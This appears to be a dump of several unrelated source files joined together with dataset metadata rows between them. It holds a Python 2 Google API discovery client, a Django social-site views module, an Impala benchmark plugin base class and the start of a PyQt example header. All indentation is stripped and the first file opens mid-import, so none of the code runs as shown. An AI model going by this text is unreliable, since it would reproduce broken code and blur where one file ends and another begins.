from cgi import parse_qsl
# Third-party imports
import httplib2
import mimeparse
import uritemplate
# Local imports
from apiclient.errors import HttpError
from apiclient.errors import InvalidJsonError
from apiclient.errors import MediaUploadSizeError
from apiclient.errors import UnacceptableMimeTypeError
from apiclient.errors import UnknownApiNameOrVersion
from apiclient.errors import UnknownFileType
from apiclient.http import HttpRequest
from apiclient.http import MediaFileUpload
from apiclient.http import MediaUpload
from apiclient.model import JsonModel
from apiclient.model import MediaModel
from apiclient.model import RawModel
from apiclient.schema import Schemas
from oauth2client.client import GoogleCredentials
from oauth2client.util import _add_query_parameter
from oauth2client.util import positional
# The client library requires a version of httplib2 that supports RETRIES.
httplib2.RETRIES = 1
logger = logging.getLogger(__name__)
URITEMPLATE = re.compile('{[^}]*}')
VARNAME = re.compile('[a-zA-Z0-9_-]+')
DISCOVERY_URI = ('https://www.googleapis.com/discovery/v1/apis/'
'{api}/{apiVersion}/rest')
DEFAULT_METHOD_DOC = 'A description of how to use this function'
HTTP_PAYLOAD_METHODS = frozenset(['PUT', 'POST', 'PATCH'])
_MEDIA_SIZE_BIT_SHIFTS = {'KB': 10, 'MB': 20, 'GB': 30, 'TB': 40}
BODY_PARAMETER_DEFAULT_VALUE = {
'description': 'The request body.',
'type': 'object',
'required': True,
}
MEDIA_BODY_PARAMETER_DEFAULT_VALUE = {
'description': ('The filename of the media request body, or an instance '
'of a MediaUpload object.'),
'type': 'string',
'required': False,
}
# Parameters accepted by the stack, but not visible via discovery.
# TODO(dhermes): Remove 'userip' in 'v2'.
STACK_QUERY_PARAMETERS = frozenset(['trace', 'pp', 'userip', 'strict'])
STACK_QUERY_PARAMETER_DEFAULT_VALUE = {'type': 'string', 'location': 'query'}
# Library-specific reserved words beyond Python keywords.
RESERVED_WORDS = frozenset(['body'])
def fix_method_name(name):
"""Fix method names to avoid reserved word conflicts.
Args:
name: string, method name.
Returns:
The name with a '_' prefixed if the name is a reserved word.
"""
if keyword.iskeyword(name) or name in RESERVED_WORDS:
return name + '_'
else:
return name
def key2param(key):
"""Converts key names into parameter names.
For example, converting "max-results" -> "max_results"
Args:
key: string, the method key name.
Returns:
A safe method name based on the key name.
"""
result = []
key = list(key)
if not key[0].isalpha():
result.append('x')
for c in key:
if c.isalnum():
result.append(c)
else:
result.append('_')
return ''.join(result)
@positional(2)
def build(serviceName,
version,
http=None,
discoveryServiceUrl=DISCOVERY_URI,
developerKey=None,
model=None,
requestBuilder=HttpRequest,
credentials=None):
"""Construct a Resource for interacting with an API.
Construct a Resource object for interacting with an API. The serviceName and
version are the names from the Discovery service.
Args:
serviceName: string, name of the service.
version: string, the version of the service.
http: httplib2.Http, An instance of httplib2.Http or something that acts
like it that HTTP requests will be made through.
discoveryServiceUrl: string, a URI Template that points to the location of
the discovery service. It should have two parameters {api} and
{apiVersion} that when filled in produce an absolute URI to the discovery
document for that service.
developerKey: string, key obtained from
https://code.google.com/apis/console.
model: apiclient.Model, converts to and from the wire format.
requestBuilder: apiclient.http.HttpRequest, encapsulator for an HTTP
request.
credentials: oauth2client.Credentials, credentials to be used for
authentication.
Returns:
A Resource object with methods for interacting with the service.
"""
params = {
'api': serviceName,
'apiVersion': version
}
if http is None:
http = httplib2.Http()
requested_url = uritemplate.expand(discoveryServiceUrl, params)
# REMOTE_ADDR is defined by the CGI spec [RFC3875] as the environment
# variable that contains the network address of the client sending the
# request. If it exists then add that to the request for the discovery
# document to avoid exceeding the quota on discovery requests.
if 'REMOTE_ADDR' in os.environ:
requested_url = _add_query_parameter(requested_url, 'userIp',
os.environ['REMOTE_ADDR'])
logger.info('URL being requested: GET %s' % requested_url)
resp, content = http.request(requested_url)
if resp.status == 404:
raise UnknownApiNameOrVersion("name: %s version: %s" % (serviceName,
version))
if resp.status >= 400:
raise HttpError(resp, content, uri=requested_url)
try:
service = json.loads(content)
except ValueError, e:
logger.error('Failed to parse as JSON: ' + content)
raise InvalidJsonError()
return build_from_document(content, base=discoveryServiceUrl, http=http,
developerKey=developerKey, model=model, requestBuilder=requestBuilder,
credentials=credentials)
@positional(1)
def build_from_document(
service,
base=None,
future=None,
http=None,
developerKey=None,
model=None,
requestBuilder=HttpRequest,
credentials=None):
"""Create a Resource for interacting with an API.
Same as `build()`, but constructs the Resource object from a discovery
document that is it given, as opposed to retrieving one over HTTP.
Args:
service: string or object, the JSON discovery document describing the API.
The value passed in may either be the JSON string or the deserialized
JSON.
base: string, base URI for all HTTP requests, usually the discovery URI.
This parameter is no longer used as rootUrl and servicePath are included
within the discovery document. (deprecated)
future: string, discovery document with future capabilities (deprecated).
http: httplib2.Http, An instance of httplib2.Http or something that acts
like it that HTTP requests will be made through.
developerKey: string, Key for controlling API usage, generated
from the API Console.
model: Model class instance that serializes and de-serializes requests and
responses.
requestBuilder: Takes an http request and packages it up to be executed.
credentials: object, credentials to be used for authentication.
Returns:
A Resource object with methods for interacting with the service.
"""
# future is no longer used.
future = {}
if isinstance(service, basestring):
service = json.loads(service)
base = urlparse.urljoin(service['rootUrl'], service['servicePath'])
schema = Schemas(service)
if credentials:
# If credentials were passed in, we could have two cases:
# 1. the scopes were specified, in which case the given credentials
# are used for authorizing the http;
# 2. the scopes were not provided (meaning the Application Default
# Credentials are to be used). In this case, the Application Default
# Credentials are built and used instead of the original credentials.
# If there are no scopes found (meaning the given service requires no
# authentication), there is no authorization of the http.
if (isinstance(credentials, GoogleCredentials) and
credentials.create_scoped_required()):
scopes = service.get('auth', {}).get('oauth2', {}).get('scopes', {})
if scopes:
credentials = credentials.create_scoped(scopes.keys())
else:
# No need to authorize the http object
# if the service does not require authentication.
credentials = None
if credentials:
http = credentials.authorize(http)
if model is None:
features = service.get('features', [])
model = JsonModel('dataWrapper' in features)
return Resource(http=http, baseUrl=base, model=model,
developerKey=developerKey, requestBuilder=requestBuilder,
resourceDesc=service, rootDesc=service, schema=schema)
def _cast(value, schema_type):
"""Convert value to a string based on JSON Schema type.
See http://tools.ietf.org/html/draft-zyp-json-schema-03 for more details on
JSON Schema.
Args:
value: any, the value to convert
schema_type: string, the type that value should be interpreted as
Returns:
A string representation of 'value' based on the schema_type.
"""
if schema_type == 'string':
if type(value) == type('') or type(value) == type(u''):
return value
else:
return str(value)
elif schema_type == 'integer':
return str(int(value))
elif schema_type == 'number':
return str(float(value))
elif schema_type == 'boolean':
return str(bool(value)).lower()
else:
if type(value) == type('') or type(value) == type(u''):
return value
else:
return str(value)
def _media_size_to_long(maxSize):
"""Convert a string media size, such as 10GB or 3TB into an integer.
Args:
maxSize: string, size as a string, such as 2MB or 7GB.
Returns:
The size as an integer value.
"""
if len(maxSize) < 2:
return 0L
units = maxSize[-2:].upper()
bit_shift = _MEDIA_SIZE_BIT_SHIFTS.get(units)
if bit_shift is not None:
return long(maxSize[:-2]) << bit_shift
else:
return long(maxSize)
def _media_path_url_from_info(root_desc, path_url):
"""Creates an absolute media path URL.
Constructed using the API root URI and service path from the discovery
document and the relative path for the API method.
Args:
root_desc: Dictionary; the entire original deserialized discovery document.
path_url: String; the relative URL for the API method. Relative to the API
root, which is specified in the discovery document.
Returns:
String; the absolute URI for media upload for the API method.
"""
return '%(root)supload/%(service_path)s%(path)s' % {
'root': root_desc['rootUrl'],
'service_path': root_desc['servicePath'],
'path': path_url,
}
def _fix_up_parameters(method_desc, root_desc, http_method):
"""Updates parameters of an API method with values specific to this library.
Specifically, adds whatever global parameters are specified by the API to the
parameters for the individual method. Also adds parameters which don't
appear in the discovery document, but are available to all discovery based
APIs (these are listed in STACK_QUERY_PARAMETERS).
SIDE EFFECTS: This updates the parameters dictionary object in the method
description.
Args:
method_desc: Dictionary with metadata describing an API method. Value comes
from the dictionary of methods stored in the 'methods' key in the
deserialized discovery document.
root_desc: Dictionary; the entire original deserialized discovery document.
http_method: String; the HTTP method used to call the API method described
in method_desc.
Returns:
The updated Dictionary stored in the 'parameters' key of the method
description dictionary.
"""
parameters = method_desc.setdefault('parameters', {})
# Add in the parameters common to all methods.
for name, description in root_desc.get('parameters', {}).iteritems():
parameters[name] = description
# Add in undocumented query parameters.
for name in STACK_QUERY_PARAMETERS:
parameters[name] = STACK_QUERY_PARAMETER_DEFAULT_VALUE.copy()
# Add 'body' (our own reserved word) to parameters if the method supports
# a request payload.
if http_method in HTTP_PAYLOAD_METHODS and 'request' in method_desc:
body = BODY_PARAMETER_DEFAULT_VALUE.copy()
body.update(method_desc['request'])
parameters['body'] = body
return parameters
def _fix_up_media_upload(method_desc, root_desc, path_url, parameters):
"""Updates parameters of API by adding 'media_body' if supported by method.
SIDE EFFECTS: If the method supports media upload and has a required body,
sets body to be optional (required=False) instead. Also, if there is a
'mediaUpload' in the method description, adds 'media_upload' key to
parameters.
Args:
method_desc: Dictionary with metadata describing an API method. Value comes
from the dictionary of methods stored in the 'methods' key in the
deserialized discovery document.
root_desc: Dictionary; the entire original deserialized discovery document.
path_url: String; the relative URL for the API method. Relative to the API
root, which is specified in the discovery document.
parameters: A dictionary describing method parameters for method described
in method_desc.
Returns:
Triple (accept, max_size, media_path_url) where:
- accept is a list of strings representing what content types are
accepted for media upload. Defaults to empty list if not in the
discovery document.
- max_size is a long representing the max size in bytes allowed for a
media upload. Defaults to 0L if not in the discovery document.
- media_path_url is a String; the absolute URI for media upload for the
API method. Constructed using the API root URI and service path from
the discovery document and the relative path for the API method. If
media upload is not supported, this is None.
"""
media_upload = method_desc.get('mediaUpload', {})
accept = media_upload.get('accept', [])
max_size = _media_size_to_long(media_upload.get('maxSize', ''))
media_path_url = None
if media_upload:
media_path_url = _media_path_url_from_info(root_desc, path_url)
parameters['media_body'] = MEDIA_BODY_PARAMETER_DEFAULT_VALUE.copy()
if 'body' in parameters:
parameters['body']['required'] = False
return accept, max_size, media_path_url
def _fix_up_method_description(method_desc, root_desc):
"""Updates a method description in a discovery document.
SIDE EFFECTS: Changes the parameters dictionary in the method description with
extra parameters which are used locally.
Args:
method_desc: Dictionary with metadata describing an API method. Value comes
from the dictionary of methods stored in the 'methods' key in the
deserialized discovery document.
root_desc: Dictionary; the entire original deserialized discovery document.
Returns:
Tuple (path_url, http_method, method_id, accept, max_size, media_path_url)
where:
- path_url is a String; the relative URL for the API method. Relative to
the API root, which is specified in the discovery document.
- http_method is a String; the HTTP method used to call the API method
described in the method description.
- method_id is a String; the name of the RPC method associated with the
API method, and is in the method description in the 'id' key.
- accept is a list of strings representing what content types are
accepted for media upload. Defaults to empty list if not in the
discovery document.
- max_size is a long representing the max size in bytes allowed for a
media upload. Defaults to 0L if not in the discovery document.
- media_path_url is a String; the absolute URI for media upload for the
API method. Constructed using the API root URI and service path from
the discovery document and the relative path for the API method. If
media upload is not supported, this is None.
"""
path_url = method_desc['path']
http_method = method_desc['httpMethod']
method_id = method_desc['id']
parameters = _fix_up_parameters(method_desc, root_desc, http_method)
# Order is important. `_fix_up_media_upload` needs `method_desc` to have a
# 'parameters' key and needs to know if there is a 'body' parameter because it
# also sets a 'media_body' parameter.
accept, max_size, media_path_url = _fix_up_media_upload(
method_desc, root_desc, path_url, parameters)
return path_url, http_method, method_id, accept, max_size, media_path_url
# TODO(dhermes): Convert this class to ResourceMethod and make it callable
class ResourceMethodParameters(object):
"""Represents the parameters associated with a method.
Attributes:
argmap: Map from method parameter name (string) to query parameter name
(string).
required_params: List of required parameters (represented by parameter
name as string).
repeated_params: List of repeated parameters (represented by parameter
name as string).
pattern_params: Map from method parameter name (string) to regular
expression (as a string). If the pattern is set for a parameter, the
value for that parameter must match the regular expression.
query_params: List of parameters (represented by parameter name as string)
that will be used in the query string.
path_params: Set of parameters (represented by parameter name as string)
that will be used in the base URL path.
param_types: Map from method parameter name (string) to parameter type. Type
can be any valid JSON schema type; valid values are 'any', 'array',
'boolean', 'integer', 'number', 'object', or 'string'. Reference:
http://tools.ietf.org/html/draft-zyp-json-schema-03#section-5.1
enum_params: Map from method parameter name (string) to list of strings,
where each list of strings is the list of acceptable enum values.
"""
def __init__(self, method_desc):
"""Constructor for ResourceMethodParameters.
Sets default values and defers to set_parameters to populate.
Args:
method_desc: Dictionary with metadata describing an API method. Value
comes from the dictionary of methods stored in the 'methods' key in
the deserialized discovery document.
"""
self.argmap = {}
self.required_params = []
self.repeated_params = []
self.pattern_params = {}
self.query_params = []
# TODO(dhermes): Change path_params to a list if the extra URITEMPLATE
# parsing is gotten rid of.
self.path_params = set()
self.param_types = {}
self.enum_params = {}
self.set_parameters(method_desc)
def set_parameters(self, method_desc):
"""Populates maps and lists based on method description.
Iterates through each parameter for the method and parses the values from
the parameter dictionary.
Args:
method_desc: Dictionary with metadata describing an API method. Value
comes from the dictionary of methods stored in the 'methods' key in
the deserialized discovery document.
"""
for arg, desc in method_desc.get('parameters', {}).iteritems():
param = key2param(arg)
self.argmap[param] = arg
if desc.get('pattern'):
self.pattern_params[param] = desc['pattern']
if desc.get('enum'):
self.enum_params[param] = desc['enum']
if desc.get('required'):
self.required_params.append(param)
if desc.get('repeated'):
self.repeated_params.append(param)
if desc.get('location') == 'query':
self.query_params.append(param)
if desc.get('location') == 'path':
self.path_params.add(param)
self.param_types[param] = desc.get('type', 'string')
# TODO(dhermes): Determine if this is still necessary. Discovery based APIs
# should have all path parameters already marked with
# 'location: path'.
for match in URITEMPLATE.finditer(method_desc['path']):
for namematch in VARNAME.finditer(match.group(0)):
name = key2param(namematch.group(0))
self.path_params.add(name)
if name in self.query_params:
self.query_params.remove(name)
def createMethod(methodName, methodDesc, rootDesc, schema):
"""Creates a method for attaching to a Resource.
Args:
methodName: string, name of the method to use.
methodDesc: object, fragment of deserialized discovery document that
describes the method.
rootDesc: object, the entire deserialized discovery document.
schema: object, mapping of schema names to schema descriptions.
"""
methodName = fix_method_name(methodName)
(pathUrl, httpMethod, methodId, accept,
maxSize, mediaPathUrl) = _fix_up_method_description(methodDesc, rootDesc)
parameters = ResourceMethodParameters(methodDesc)
def method(self, **kwargs):
# Don't bother with doc string, it will be over-written by createMethod.
for name in kwargs.iterkeys():
if name not in parameters.argmap:
raise TypeError('Got an unexpected keyword argument "%s"' % name)
# Remove args that have a value of None.
keys = kwargs.keys()
for name in keys:
if kwargs[name] is None:
del kwargs[name]
for name in parameters.required_params:
if name not in kwargs:
raise TypeError('Missing required parameter "%s"' % name)
for name, regex in parameters.pattern_params.iteritems():
if name in kwargs:
if isinstance(kwargs[name], basestring):
pvalues = [kwargs[name]]
else:
pvalues = kwargs[name]
for pvalue in pvalues:
if re.match(regex, pvalue) is None:
raise TypeError(
'Parameter "%s" value "%s" does not match the pattern "%s"' %
(name, pvalue, regex))
for name, enums in parameters.enum_params.iteritems():
if name in kwargs:
# We need to handle the case of a repeated enum
# name differently, since we want to handle both
# arg='value' and arg=['value1', 'value2']
if (name in parameters.repeated_params and
not isinstance(kwargs[name], basestring)):
values = kwargs[name]
else:
values = [kwargs[name]]
for value in values:
if value not in enums:
raise TypeError(
'Parameter "%s" value "%s" is not an allowed value in "%s"' %
(name, value, str(enums)))
actual_query_params = {}
actual_path_params = {}
for key, value in kwargs.iteritems():
to_type = parameters.param_types.get(key, 'string')
# For repeated parameters we cast each member of the list.
if key in parameters.repeated_params and type(value) == type([]):
cast_value = [_cast(x, to_type) for x in value]
else:
cast_value = _cast(value, to_type)
if key in parameters.query_params:
actual_query_params[parameters.argmap[key]] = cast_value
if key in parameters.path_params:
actual_path_params[parameters.argmap[key]] = cast_value
body_value = kwargs.get('body', None)
media_filename = kwargs.get('media_body', None)
if self._developerKey:
actual_query_params['key'] = self._developerKey
model = self._model
if methodName.endswith('_media'):
model = MediaModel()
elif 'response' not in methodDesc:
model = RawModel()
headers = {}
headers, params, query, body = model.request(headers,
actual_path_params, actual_query_params, body_value)
expanded_url = uritemplate.expand(pathUrl, params)
url = urlparse.urljoin(self._baseUrl, expanded_url + query)
resumable = None
multipart_boundary = ''
if media_filename:
# Ensure we end up with a valid MediaUpload object.
if isinstance(media_filename, basestring):
(media_mime_type, encoding) = mimetypes.guess_type(media_filename)
if media_mime_type is None:
raise UnknownFileType(media_filename)
if not mimeparse.best_match([media_mime_type], ','.join(accept)):
raise UnacceptableMimeTypeError(media_mime_type)
media_upload = MediaFileUpload(media_filename,
mimetype=media_mime_type)
elif isinstance(media_filename, MediaUpload):
media_upload = media_filename
else:
raise TypeError('media_filename must be str or MediaUpload.')
# Check the maxSize
if maxSize > 0 and media_upload.size() > maxSize:
raise MediaUploadSizeError("Media larger than: %s" % maxSize)
# Use the media path uri for media uploads
expanded_url = uritemplate.expand(mediaPathUrl, params)
url = urlparse.urljoin(self._baseUrl, expanded_url + query)
if media_upload.resumable():
url = _add_query_parameter(url, 'uploadType', 'resumable')
if media_upload.resumable():
# This is all we need to do for resumable, if the body exists it gets
# sent in the first request, otherwise an empty body is sent.
resumable = media_upload
else:
# A non-resumable upload
if body is None:
# This is a simple media upload
headers['content-type'] = media_upload.mimetype()
body = media_upload.getbytes(0, media_upload.size())
url = _add_query_parameter(url, 'uploadType', 'media')
else:
# This is a multipart/related upload.
msgRoot = MIMEMultipart('related')
# msgRoot should not write out it's own headers
setattr(msgRoot, '_write_headers', lambda self: None)
# attach the body as one part
msg = MIMENonMultipart(*headers['content-type'].split('/'))
msg.set_payload(body)
msgRoot.attach(msg)
# attach the media as the second part
msg = MIMENonMultipart(*media_upload.mimetype().split('/'))
msg['Content-Transfer-Encoding'] = 'binary'
payload = media_upload.getbytes(0, media_upload.size())
msg.set_payload(payload)
msgRoot.attach(msg)
# encode the body: note that we can't use `as_string`, because
# it plays games with `From ` lines.
fp = StringIO.StringIO()
g = Generator(fp, mangle_from_=False)
g.flatten(msgRoot, unixfrom=False)
body = fp.getvalue()
multipart_boundary = msgRoot.get_boundary()
headers['content-type'] = ('multipart/related; '
'boundary="%s"') % multipart_boundary
url = _add_query_parameter(url, 'uploadType', 'multipart')
logger.info('URL being requested: %s %s' % (httpMethod,url))
return self._requestBuilder(self._http,
model.response,
url,
method=httpMethod,
body=body,
headers=headers,
methodId=methodId,
resumable=resumable)
docs = [methodDesc.get('description', DEFAULT_METHOD_DOC), '\n\n']
if len(parameters.argmap) > 0:
docs.append('Args:\n')
# Skip undocumented params and params common to all methods.
skip_parameters = rootDesc.get('parameters', {}).keys()
skip_parameters.extend(STACK_QUERY_PARAMETERS)
all_args = parameters.argmap.keys()
args_ordered = [key2param(s) for s in methodDesc.get('parameterOrder', [])]
# Move body to the front of the line.
if 'body' in all_args:
args_ordered.append('body')
for name in all_args:
if name not in args_ordered:
args_ordered.append(name)
for arg in args_ordered:
if arg in skip_parameters:
continue
repeated = ''
if arg in parameters.repeated_params:
repeated = ' (repeated)'
required = ''
if arg in parameters.required_params:
required = ' (required)'
paramdesc = methodDesc['parameters'][parameters.argmap[arg]]
paramdoc = paramdesc.get('description', 'A parameter')
if '$ref' in paramdesc:
docs.append(
(' %s: object, %s%s%s\n The object takes the'
' form of:\n\n%s\n\n') % (arg, paramdoc, required, repeated,
schema.prettyPrintByName(paramdesc['$ref'])))
else:
paramtype = paramdesc.get('type', 'string')
docs.append(' %s: %s, %s%s%s\n' % (arg, paramtype, paramdoc, required,
repeated))
enum = paramdesc.get('enum', [])
enumDesc = paramdesc.get('enumDescriptions', [])
if enum and enumDesc:
docs.append(' Allowed values\n')
for (name, desc) in zip(enum, enumDesc):
docs.append(' %s - %s\n' % (name, desc))
if 'response' in methodDesc:
if methodName.endswith('_media'):
docs.append('\nReturns:\n The media object as a string.\n\n ')
else:
docs.append('\nReturns:\n An object of the form:\n\n ')
docs.append(schema.prettyPrintSchema(methodDesc['response']))
setattr(method, '__doc__', ''.join(docs))
return (methodName, method)
def createNextMethod(methodName):
"""Creates any _next methods for attaching to a Resource.
The _next methods allow for easy iteration through list() responses.
Args:
methodName: string, name of the method to use.
"""
methodName = fix_method_name(methodName)
def methodNext(self, previous_request, previous_response):
"""Retrieves the next page of results.
Args:
previous_request: The request for the previous page. (required)
previous_response: The response from the request for the previous page. (required)
Returns:
A request object that you can call 'execute()' on to request the next
page. Returns None if there are no more items in the collection.
"""
# Retrieve nextPageToken from previous_response
# Use as pageToken in previous_request to create new request.
if 'nextPageToken' not in previous_response:
return None
request = copy.copy(previous_request)
pageToken = previous_response['nextPageToken']
parsed = list(urlparse.urlparse(request.uri))
q = parse_qsl(parsed[4])
# Find and remove old 'pageToken' value from URI
newq = [(key, value) for (key, value) in q if key != 'pageToken']
newq.append(('pageToken', pageToken))
parsed[4] = urllib.urlencode(newq)
uri = urlparse.urlunparse(parsed)
request.uri = uri
logger.info('URL being requested: %s %s' % (methodName,uri))
return request
return (methodName, methodNext)
class Resource(object):
"""A class for interacting with a resource."""
def __init__(self, http, baseUrl, model, requestBuilder, developerKey,
resourceDesc, rootDesc, schema):
"""Build a Resource from the API description.
Args:
http: httplib2.Http, Object to make http requests with.
baseUrl: string, base URL for the API. All requests are relative to this
URI.
model: apiclient.Model, converts to and from the wire format.
requestBuilder: class or callable that instantiates an
apiclient.HttpRequest object.
developerKey: string, key obtained from
https://code.google.com/apis/console
resourceDesc: object, section of deserialized discovery document that
describes a resource. Note that the top level discovery document
is considered a resource.
rootDesc: object, the entire deserialized discovery document.
schema: object, mapping of schema names to schema descriptions.
"""
self._dynamic_attrs = []
self._http = http
self._baseUrl = baseUrl
self._model = model
self._developerKey = developerKey
self._requestBuilder = requestBuilder
self._resourceDesc = resourceDesc
self._rootDesc = rootDesc
self._schema = schema
self._set_service_methods()
def _set_dynamic_attr(self, attr_name, value):
"""Sets an instance attribute and tracks it in a list of dynamic attributes.
Args:
attr_name: string; The name of the attribute to be set
value: The value being set on the object and tracked in the dynamic cache.
"""
self._dynamic_attrs.append(attr_name)
self.__dict__[attr_name] = value
def __getstate__(self):
"""Trim the state down to something that can be pickled.
Uses the fact that the instance variable _dynamic_attrs holds attrs that
will be wiped and restored on pickle serialization.
"""
state_dict = copy.copy(self.__dict__)
for dynamic_attr in self._dynamic_attrs:
del state_dict[dynamic_attr]
del state_dict['_dynamic_attrs']
return state_dict
def __setstate__(self, state):
"""Reconstitute the state of the object from being pickled.
Uses the fact that the instance variable _dynamic_attrs holds attrs that
will be wiped and restored on pickle serialization.
"""
self.__dict__.update(state)
self._dynamic_attrs = []
self._set_service_methods()
def _set_service_methods(self):
self._add_basic_methods(self._resourceDesc, self._rootDesc, self._schema)
self._add_nested_resources(self._resourceDesc, self._rootDesc, self._schema)
self._add_next_methods(self._resourceDesc, self._schema)
def _add_basic_methods(self, resourceDesc, rootDesc, schema):
# Add basic methods to Resource
if 'methods' in resourceDesc:
for methodName, methodDesc in resourceDesc['methods'].iteritems():
fixedMethodName, method = createMethod(
methodName, methodDesc, rootDesc, schema)
self._set_dynamic_attr(fixedMethodName,
method.__get__(self, self.__class__))
# Add in _media methods. The functionality of the attached method will
# change when it sees that the method name ends in _media.
if methodDesc.get('supportsMediaDownload', False):
fixedMethodName, method = createMethod(
methodName + '_media', methodDesc, rootDesc, schema)
self._set_dynamic_attr(fixedMethodName,
method.__get__(self, self.__class__))
def _add_nested_resources(self, resourceDesc, rootDesc, schema):
# Add in nested resources
if 'resources' in resourceDesc:
def createResourceMethod(methodName, methodDesc):
"""Create a method on the Resource to access a nested Resource.
Args:
methodName: string, name of the method to use.
methodDesc: object, fragment of deserialized discovery document that
describes the method.
"""
methodName = fix_method_name(methodName)
def methodResource(self):
return Resource(http=self._http, baseUrl=self._baseUrl,
model=self._model, developerKey=self._developerKey,
requestBuilder=self._requestBuilder,
resourceDesc=methodDesc, rootDesc=rootDesc,
schema=schema)
setattr(methodResource, '__doc__', 'A collection resource.')
setattr(methodResource, '__is_resource__', True)
return (methodName, methodResource)
for methodName, methodDesc in resourceDesc['resources'].iteritems():
fixedMethodName, method = createResourceMethod(methodName, methodDesc)
self._set_dynamic_attr(fixedMethodName,
method.__get__(self, self.__class__))
def _add_next_methods(self, resourceDesc, schema):
# Add _next() methods
# Look for response bodies in schema that contain nextPageToken, and methods
# that take a pageToken parameter.
if 'methods' in resourceDesc:
for methodName, methodDesc in resourceDesc['methods'].iteritems():
if 'response' in methodDesc:
responseSchema = methodDesc['response']
if '$ref' in responseSchema:
responseSchema = schema.get(responseSchema['$ref'])
hasNextPageToken = 'nextPageToken' in responseSchema.get('properties',
{})
hasPageToken = 'pageToken' in methodDesc.get('parameters', {})
if hasNextPageToken and hasPageToken:
fixedMethodName, method = createNextMethod(methodName + '_next')
self._set_dynamic_attr(fixedMethodName,
method.__get__(self, self.__class__))
| gpl-3.0 | -8,657,726,699,740,054,000 | 36.60603 | 84 | 0.669704 | false |
drakeloud/louderdev | louderdev/core/views.py | 1 | 5391 | import os
from django.conf import settings as django_settings
from django.contrib import messages
from django.contrib.auth import update_session_auth_hash
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator
from django.shortcuts import get_object_or_404, redirect, render
from louderdev.core.forms import ChangePasswordForm, ProfileForm
from louderdev.feeds.models import Feed
from louderdev.feeds.views import FEEDS_NUM_PAGES, feeds
from PIL import Image
# def home(request):
# return render(request, 'core/home.html')
def profilehome(request):
if request.user.is_authenticated():
return feeds(request)
else:
return render(request, 'core/cover.html')
@login_required
def network(request):
users_list = User.objects.filter(is_active=True).order_by('username')
paginator = Paginator(users_list, 100)
page = request.GET.get('page')
try:
users = paginator.page(page)
except PageNotAnInteger:
users = paginator.page(1)
except EmptyPage:
users = paginator.page(paginator.num_pages)
return render(request, 'core/network.html', {'users': users})
@login_required
def profile(request, username):
page_user = get_object_or_404(User, username=username)
all_feeds = Feed.get_feeds().filter(user=page_user)
paginator = Paginator(all_feeds, FEEDS_NUM_PAGES)
feeds = paginator.page(1)
from_feed = -1
if feeds:
from_feed = feeds[0].id
return render(request, 'core/profile.html', {
'page_user': page_user,
'feeds': feeds,
'from_feed': from_feed,
'page': 1
})
@login_required
def settings(request):
user = request.user
if request.method == 'POST':
form = ProfileForm(request.POST)
if form.is_valid():
user.first_name = form.cleaned_data.get('first_name')
user.last_name = form.cleaned_data.get('last_name')
user.profile.job_title = form.cleaned_data.get('job_title')
user.email = form.cleaned_data.get('email')
user.profile.url = form.cleaned_data.get('url')
user.profile.location = form.cleaned_data.get('location')
user.save()
messages.add_message(request,
messages.SUCCESS,
'Your profile was successfully edited.')
else:
form = ProfileForm(instance=user, initial={
'job_title': user.profile.job_title,
'url': user.profile.url,
'location': user.profile.location
})
return render(request, 'core/settings.html', {'form': form})
@login_required
def picture(request):
uploaded_picture = False
try:
if request.GET.get('upload_picture') == 'uploaded':
uploaded_picture = True
except Exception:
pass
return render(request, 'core/picture.html',
{'uploaded_picture': uploaded_picture})
@login_required
def password(request):
user = request.user
if request.method == 'POST':
form = ChangePasswordForm(request.POST)
if form.is_valid():
new_password = form.cleaned_data.get('new_password')
user.set_password(new_password)
user.save()
update_session_auth_hash(request, user)
messages.add_message(request, messages.SUCCESS,
'Your password was successfully changed.')
return redirect('password')
else:
form = ChangePasswordForm(instance=user)
return render(request, 'core/password.html', {'form': form})
@login_required
def upload_picture(request):
try:
profile_pictures = django_settings.MEDIA_ROOT + '/profile_pictures/'
if not os.path.exists(profile_pictures):
os.makedirs(profile_pictures)
f = request.FILES['picture']
filename = profile_pictures + request.user.username + '_tmp.jpg'
with open(filename, 'wb+') as destination:
for chunk in f.chunks():
destination.write(chunk)
im = Image.open(filename)
width, height = im.size
if width > 350:
new_width = 350
new_height = (height * 350) / width
new_size = new_width, new_height
im.thumbnail(new_size, Image.ANTIALIAS)
im.save(filename)
return redirect('/settings/picture/?upload_picture=uploaded')
except Exception as e:
print(e)
return redirect('/settings/picture/')
@login_required
def save_uploaded_picture(request):
try:
x = int(request.POST.get('x'))
y = int(request.POST.get('y'))
w = int(request.POST.get('w'))
h = int(request.POST.get('h'))
tmp_filename = django_settings.MEDIA_ROOT + '/profile_pictures/' +\
request.user.username + '_tmp.jpg'
filename = django_settings.MEDIA_ROOT + '/profile_pictures/' +\
request.user.username + '.jpg'
im = Image.open(tmp_filename)
cropped_im = im.crop((x, y, w+x, h+y))
cropped_im.thumbnail((200, 200), Image.ANTIALIAS)
cropped_im.save(filename)
os.remove(tmp_filename)
except Exception:
pass
return redirect('/settings/picture/')
| mit | -7,148,828,891,179,885,000 | 31.871951 | 76 | 0.621035 | false |
cloudera/Impala | tests/benchmark/plugins/__init__.py | 3 | 1407 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
class Plugin(object):
'''Base plugin class.
Defines the interfaces that all plugins will use.
The interface consists of:
* The scope, which defines when the plugin will run.
The different scopes are:
* per query
* per workload
* per test suite run
* A pre-hook method, which is run at the beginning of the 'scope'
* A post-hook method, which is run at the end of the scope.
'''
__name__ = "BasePlugin"
def __init__(self, scope=None):
self.scope = scope
def run_pre_hook(self, context=None):
pass
def run_post_hook(self, context=None):
pass
| apache-2.0 | -3,696,564,679,421,713,400 | 34.175 | 70 | 0.711443 | false |
anomitra/articleScraper | PyQt-gpl-5.4.1/examples/animation/moveblocks.py | 2 | 8146 | #!/usr/bin/env python
#############################################################################
##
## Copyright (C) 2013 Riverbank Computing Limited.
## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).
## All rights reserved.
##
## This file is part of the examples of PyQt.
##
## $QT_BEGIN_LICENSE:BSD$
